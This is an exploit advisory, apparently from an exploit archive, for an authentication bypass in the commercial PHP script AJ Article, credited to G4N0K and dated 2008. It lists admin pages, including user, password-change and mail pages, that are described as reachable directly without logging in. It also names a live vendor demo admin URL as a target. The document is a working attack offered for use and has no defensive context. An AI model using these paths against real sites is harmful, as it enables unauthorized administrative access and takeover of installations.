id: 4148
date: 11/10/2008
title: AJ ARTICLE Remote Authentication Bypass Vulnerability
author: G4N0K
cves: 

=====================================================
AJ ARTICLE Remote Authentication Bypass Vulnerability
=====================================================

==============================================================================
	AJ Article Auth Bypass Vulnerability
==============================================================================

	[»] Script:             [ AJ Article ]
	[»] Language:           [ PHP ]
	[»] Website:            [ http://www.ajsquare.com/products/article/ ]
	[»] Type:               [ Commercial ]
	[»] Report-Date:        [ 10.11.2008 ]
	[»] Founder:            [ G4N0K ]


===[ XPL ]===
	
	[»] http://localhost/[path]/admin/user.php
	[»] http://localhost/[path]/admin/articles.php
	[»] http://localhost/[path]/admin/articlesuspend.php
	[»] http://localhost/[path]/admin/site.php
	[»] http://localhost/[path]/admin/statistics.php
	[»] http://localhost/[path]/admin/mail.php
	[»] http://localhost/[path]/admin/category.php
	[»] http://localhost/[path]/admin/subcategory.php
	[»] http://localhost/[path]/admin/changepassword.php
	[»] http://localhost/[path]/admin/polling.php
	[»] http://localhost/[path]/admin/logo.php
	[»] ...
	


===[ LIVE ]===

	[»] http://www.ajsquare.com/products/demo/admin/




#  0day.today [2023-03-22]  #